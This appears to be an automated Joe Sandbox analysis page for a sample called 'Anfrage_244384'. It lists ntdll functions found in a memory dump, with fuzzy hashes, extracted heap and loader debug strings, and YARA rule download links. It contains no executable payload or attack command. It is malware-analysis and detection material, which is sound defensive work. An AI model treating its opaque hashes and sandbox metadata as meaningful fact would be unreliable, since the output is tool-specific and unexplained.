Similarity

API ID:
String ID: H/i4$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-759644102
Opcode ID: a5989d1ab3e2f38073eb5b6123358a1e36b57555636b1ec34a61eeb9bba5f5bf
Instruction ID: 656ef4891e074e5106c63b98f89974f6582e03d403d38189daa904356934fa47
Opcode Fuzzy Hash: a5989d1ab3e2f38073eb5b6123358a1e36b57555636b1ec34a61eeb9bba5f5bf
Instruction Fuzzy Hash: B3F14CB6D10218EFDF45CFA4C990ADEBBF9FF58A50F51006AE505A7210EB709E01CBA4

Function 3468B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 346D84D0
API set, xrefs: 346D83F4, 346D83F9
LdrpPreprocessDllName, xrefs: 346D8403, 346D84D7
SxS, xrefs: 346D83ED
DLL %wZ was redirected to %wZ by %s, xrefs: 346D83FC
minkernel\ntdll\ldrutil.c, xrefs: 346D840D, 346D84E1

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: dbc31b53bb2ef1527f4dc2e3a5d7b8ce6161fa3cc1a53cbcfe646f548c0be38e
Instruction ID: 0f5e67cdc32214d756d491511d2568b6efa86610e9a8d2cc9476c4f5ee1fe886
Opcode Fuzzy Hash: dbc31b53bb2ef1527f4dc2e3a5d7b8ce6161fa3cc1a53cbcfe646f548c0be38e
Instruction Fuzzy Hash: 9AC15571A00315EFEB148F64C891BBE7BA9AF56B14F14406DF825EB291EB74CC48C792

Function 34680770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 346D50CA
HEAP[%wZ]: , xrefs: 346D50AE
HEAP: , xrefs: 346D50BD

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: a8907f48dffd376cd8c7e286eac9d44823e4d4b2385dc03617f72295133f8b05
Instruction ID: 8b391d2e9b378c04cdcfa5295c0f3a500004b3e8d2a7beef7294f844835619d2
Opcode Fuzzy Hash: a8907f48dffd376cd8c7e286eac9d44823e4d4b2385dc03617f72295133f8b05
Instruction Fuzzy Hash: D4F1C974B00B05DFEB14CF68C8A4B6AB7B9FF45304F1185A8E5069B791DB34E981CB91

Function 3469F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 346E02BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 346E02E7
RTL: Re-Waiting, xrefs: 346E031E

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 71e7b2c374d52fac769f1b0dd6ce0d532dfdf2a8c95eff04e3ff0083b852e9fa
Instruction ID: a5fa984d8307feac7637c3fe92bb38477923d8c1017eea532bae0016c9d3e849
Opcode Fuzzy Hash: 71e7b2c374d52fac769f1b0dd6ce0d532dfdf2a8c95eff04e3ff0083b852e9fa
Instruction Fuzzy Hash: 92E1BF74604741DFE714CF28C984B9AB7E8FB88364F110A5DF4A58B2D1DBB5D885CB42

Function 346F9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON

Download Yara Rule

Strings

KnownDllPath, xrefs: 346F9CF9
AVRF: Verifier .dlls must not have thread locals, xrefs: 346FA12D
\KnownDlls32, xrefs: 346F9C67
L, xrefs: 346FA2FB
@, xrefs: 346F9E80

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
API String ID: 3446177414-3127649145
Opcode ID: fdeacbaaf766aa3d3941c214359f2768bb3790e42b9f818483388826ff6ccf5c
Instruction ID: d172a248774eac7144203679efc50565f8a1114e8c6c408660bfef4875e0726c
Opcode Fuzzy Hash: fdeacbaaf766aa3d3941c214359f2768bb3790e42b9f818483388826ff6ccf5c
Instruction Fuzzy Hash: E33257B4A007199FEB21CF65CC88B9AB7F8FF48704F1041EAE549A7650DB71AA84CF45

Function 3474B16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3474B329
RtlDebugPrintTimes.NTDLL ref: 3474B605

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 021a7d6f2255d6010ec83dda02b0a7edaa2c8982a8a5a069c77e640c65d700c7
Instruction ID: 029042e5d5dccaa2a0eab699a33c534559f0c67f95d9280844f85d2cb293bcab
Opcode Fuzzy Hash: 021a7d6f2255d6010ec83dda02b0a7edaa2c8982a8a5a069c77e640c65d700c7
Instruction Fuzzy Hash: 7EF1E476E006158FDB08CFA9C99467EFBF6AF88210B59416DD456EF380E634EE01CB90

Function 347211A4 Relevance: 6.4, Strings: 5, Instructions: 113COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 3472123D, 347212B7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 34721261
-f4`, xrefs: 34721270
This is located in the %s field of the heap header., xrefs: 347212D6
HEAP: , xrefs: 3472124A, 3472125D, 3472125F, 347212C4

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$ -f4`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-1372849818
Opcode ID: 30ec23916534e3effba0e8517c97e6cf7b0f3e6f3069256f21a2129251bdac18
Instruction ID: 1b9e397be02ede170e49e3f47f6ab4c2e4b354d1daed53af9c47444477a2911b
Opcode Fuzzy Hash: 30ec23916534e3effba0e8517c97e6cf7b0f3e6f3069256f21a2129251bdac18
Instruction Fuzzy Hash: 8C31DE75200250EFEB10CF99C984F9673E9FF05668F50416AF402DF792EA79EC40CAA9

Function 346676B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

RtlFreeHeap, xrefs: 346CB03F
Invalid heap signature for heap at %p, xrefs: 346CB02F
, passed to %s, xrefs: 346CB040
HEAP[%wZ]: , xrefs: 346CB016
HEAP: , xrefs: 346CB023

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: a5eca04d1163ca13b502d0116bb1af4a1f1ab47f344db0e09f816e95c8124205
Instruction ID: 4e497d53e496cca00bc42fb5329905d3733b4cbe7ced0af15b18e30356ec8c1e
Opcode Fuzzy Hash: a5eca04d1163ca13b502d0116bb1af4a1f1ab47f344db0e09f816e95c8124205
Instruction Fuzzy Hash: A401F7362042A0DFE315DF28E41DF927BD8DB43E35F2440AEE00147A52CEADAC80C969

Function 346870C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 34687C96, 34688696
HEAP[%wZ]: , xrefs: 34687C6D, 34688670
HEAP: , xrefs: 34687C7C, 3468867F

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 7ac5a2d1ff2ed3bb50344e894c62d58eb0f628976197b6ff6dee678f1000da3a
Instruction ID: e8f5fa094222ff6faae92eb59545244d80063b431afbb7091340b3ba1ca88f1d
Opcode Fuzzy Hash: 7ac5a2d1ff2ed3bb50344e894c62d58eb0f628976197b6ff6dee678f1000da3a
Instruction Fuzzy Hash: CA138BB4A00769CFEB15CF68C8907A9BBB1FF59304F1481AED849AB381D734A945CF91

Function 34683D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 34684393, 346845CB, 3468486D
HEAP[%wZ]: , xrefs: 3468436D, 346845A5, 34684844
HEAP: , xrefs: 3468437C, 346845B4, 34684853

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: a43ad1bd0ec083c4f961c1a90cf1678bfce63f3253342a8a367e66be15484aa1
Instruction ID: d24898354ffaebbde71046768aee890f30d1dd647fec3ab6435923ee44c6f334
Opcode Fuzzy Hash: a43ad1bd0ec083c4f961c1a90cf1678bfce63f3253342a8a367e66be15484aa1
Instruction Fuzzy Hash: 90E29DB4A00215DFEB14CF68C890BA9BBF5FF59304F14819DD849AB386E735A885CF91

Function 3467B6C0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON

Download Yara Rule

Strings

MUI, xrefs: 3467B6D8
\Ud4, xrefs: 3467B7E4, 3467B7E7
LdrResGetRCConfig Enter, xrefs: 3467B702
LdrResGetRCConfig Exit, xrefs: 3467B714

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\Ud4
API String ID: 0-4117967564
Opcode ID: 34a8e7e7a9bbd5dd411b248851b29ffc718196d36e71089eee76f1780dd123e0
Instruction ID: c37c1bd671856667aecb3084b27a6a3b8a31a143d5cb01edb29c40991d03691b
Opcode Fuzzy Hash: 34a8e7e7a9bbd5dd411b248851b29ffc718196d36e71089eee76f1780dd123e0
Instruction Fuzzy Hash: FDB1BC79A14704CFEB15CF69C880F9DBBB6AF95B54F14492DE851EB280E730E880CB41

Function 3467B440 Relevance: 5.2, Strings: 4, Instructions: 221COMMON

Download Yara Rule

Strings

LdrpResGetResourceDirectory Exit, xrefs: 3467B477
{, xrefs: 346D37B6
LdrpResGetResourceDirectory Enter, xrefs: 3467B465
\Ud4, xrefs: 3467B5E0

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\Ud4${
API String ID: 0-2976282104
Opcode ID: eba92a6a49ed0daa3b1dbd2687fe18cffddc1ec5d535ce162745ab1fe3e2b0c9
Instruction ID: 34a12034325056dd2fe29cbf4a67e49bb0b6b7d57c6b1cc6e5f7c603ebf9c709
Opcode Fuzzy Hash: eba92a6a49ed0daa3b1dbd2687fe18cffddc1ec5d535ce162745ab1fe3e2b0c9
Instruction Fuzzy Hash: F191DDB5E04709CFEB11CF54C980BAE7BB4EF55B68F10419DE910AB290D7789E80CB95

Function 3466F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

`, xrefs: 346CE428
HEAP[%wZ]: , xrefs: 346CE3FE
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 346CE563
HEAP: , xrefs: 346CE54E

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: 7c4be97e2a746a4fc2896b650ebc370cabfa3b3a623fb8a983c0af36e0f0f7a7
Instruction ID: 7dcc0d342fccfad2a40f70725ee87215602e0606a69bf0f641aba9b084d9e671
Opcode Fuzzy Hash: 7c4be97e2a746a4fc2896b650ebc370cabfa3b3a623fb8a983c0af36e0f0f7a7
Instruction Fuzzy Hash: BF61EE76204780EFE311CF24D848F5B77E8EF84758F044869E9958B291DB38ED41CBA2

Function 34669148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

VirtualProtect Failed 0x%p %x, xrefs: 346CBABA
VirtualQuery Failed 0x%p %x, xrefs: 346CBAF7
HEAP[%wZ]: , xrefs: 346CBAA0, 346CBADD
HEAP: , xrefs: 346CBAAD, 346CBAEA

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 0915fbe3b6cf032e8459bc99b3d10205631233e68ba8eca684c6fe2e61183dcc
Instruction ID: ba72862d0071287b74daeacaf084947a73ea789581d185a6ba291e01cbaebdc7
Opcode Fuzzy Hash: 0915fbe3b6cf032e8459bc99b3d10205631233e68ba8eca684c6fe2e61183dcc
Instruction Fuzzy Hash: F931AF36600218EFDB01CF95C888F9AB7F8EF45B74F2041A9E815AB291DB74ED44CE61

Function 346B1270 Relevance: 5.1, Strings: 4, Instructions: 97COMMON

Download Yara Rule

Strings

\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 346B127B
@, xrefs: 346B12A5
Ej4, xrefs: 346B1310, 346B1320, 346B1313, 346B1325
BuildLabEx, xrefs: 346B130F

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$Ej4$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3080516617
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: c5a49ea40fe9d73aad7cb63acbe9adc546131303e4b64f9f3edeb1473f624a97
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: 4D31AFB2A00618FFEF129F96CD44EDEBBBDEF84754F004025E945A7260EB319A458B94

Function 3471FCDF Relevance: 5.1, Strings: 4, Instructions: 54COMMON

Download Yara Rule

Strings

May not destroy the process heap at %p, xrefs: 3471FD28
HEAP[%wZ]: , xrefs: 3471FD0F
RtlDestroyHeap, xrefs: 3471FD39
HEAP: , xrefs: 3471FD1C

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
API String ID: 0-4256168463
Opcode ID: 4b6fda700cfa9a53e7507947aebf13b4ebec3be126aad1633530940749708e3b
Instruction ID: 7cb07372e375c5aedcfa75a0d3039c97eea5056422bc0ee6a7400aa8430735f1
Opcode Fuzzy Hash: 4b6fda700cfa9a53e7507947aebf13b4ebec3be126aad1633530940749708e3b
Instruction Fuzzy Hash: C201F5B6100710DFDB11DF74C424BA673EAEF43668F00455AE4829F342DA38E98ACA68

Function 34677152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 346D17D9
RtlDebugPrintTimes.NTDLL ref: 346D17EE

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: a75f1c2bd40eb2e84d216ee78b8ea38ca9a0c0ea1ecf494f3fe0fe6ead0872c3
Instruction ID: d0d7f98658c0aa0a3ea210d666cae7a1241d3c42c41618412c0fd359320aa858
Opcode Fuzzy Hash: a75f1c2bd40eb2e84d216ee78b8ea38ca9a0c0ea1ecf494f3fe0fe6ead0872c3
Instruction Fuzzy Hash: D5510F74B00709EFFB05CF64C944BADBBB9FF54396F14412AE512932A0EBB4A901CB81

Function 34671460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 34671728
HEAP[%wZ]: , xrefs: 34671712
HEAP: , xrefs: 34671596

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 2347ef02fa2727501e6689a1a5de126501280fee71175133445fac3bc2edbdb7
Instruction ID: f43798e5bf5e61f585d29c72f11b25234a606e566ef34f9338f47b2e35ef37fb
Opcode Fuzzy Hash: 2347ef02fa2727501e6689a1a5de126501280fee71175133445fac3bc2edbdb7
Instruction Fuzzy Hash: B4E1EF74A04345DFEB18CF28C491ABABBF9EF58304F14885EE5968B385EB34E940CB50

Function 346F368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

\SystemRoot\system32\, xrefs: 346F3842
@, xrefs: 346F389F
DelegatedNtdll, xrefs: 346F36CE

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: @$DelegatedNtdll$\SystemRoot\system32\
API String ID: 0-2391371766
Opcode ID: 84db999b6b677742465eaf8a0ed99eb5ddb846a38528a3699211a765ef7344c5
Instruction ID: 95f2b3b0c3d02d6a55f7695943612f16bd58086d398a7c3de16dd1a4312a3646
Opcode Fuzzy Hash: 84db999b6b677742465eaf8a0ed99eb5ddb846a38528a3699211a765ef7344c5
Instruction Fuzzy Hash: D9B19DB2604741EFE711DE55CC80B5BB7E8FB84754F40092DFA90AB290DB76E884CB96

Function 347036EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON

Download Yara Rule

Strings

LdrpResMapFile Enter, xrefs: 34703715
@, xrefs: 34703867
LdrpResMapFile Exit, xrefs: 34703727

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
API String ID: 0-318774311
Opcode ID: 3c671dbe3f448cc695449d4d702e40932219e8ce2dd51e5d785752d467eaa0d8
Instruction ID: 4057514dc73825785ce885423ad2c157860037eb24ff1cd07a368e012370adbf
Opcode Fuzzy Hash: 3c671dbe3f448cc695449d4d702e40932219e8ce2dd51e5d785752d467eaa0d8
Instruction Fuzzy Hash: D28198B560A340AFE311CF15C880B6AB7E9FF84754F40896EB9849B390DB74D944CFA6

Function 346F7410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON

Download Yara Rule

Strings

VirtualAlloc, xrefs: 346F75FC
Objects=%4u, xrefs: 346F75EA
Objects>%4u, xrefs: 346F75D5

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: Objects=%4u$Objects>%4u$VirtualAlloc
API String ID: 0-3870751728
Opcode ID: e108f96131cd1a23d01151044d93aacfeb5e230fa3afd93762a7003e37a0ccf2
Instruction ID: 0dea71ac6ac639e7488ae06e276a0e132822b52586de91d8ebbc391e687e4d4b
Opcode Fuzzy Hash: e108f96131cd1a23d01151044d93aacfeb5e230fa3afd93762a7003e37a0ccf2
Instruction Fuzzy Hash: BC913AB4E003059FEB14CF69C880BADBBB1FF48315F14816AE945AB391EB769842CF54

Function 346A909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

%, xrefs: 346E5D3F
&, xrefs: 346E5CF8
@, xrefs: 346A9148

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: %$&$@
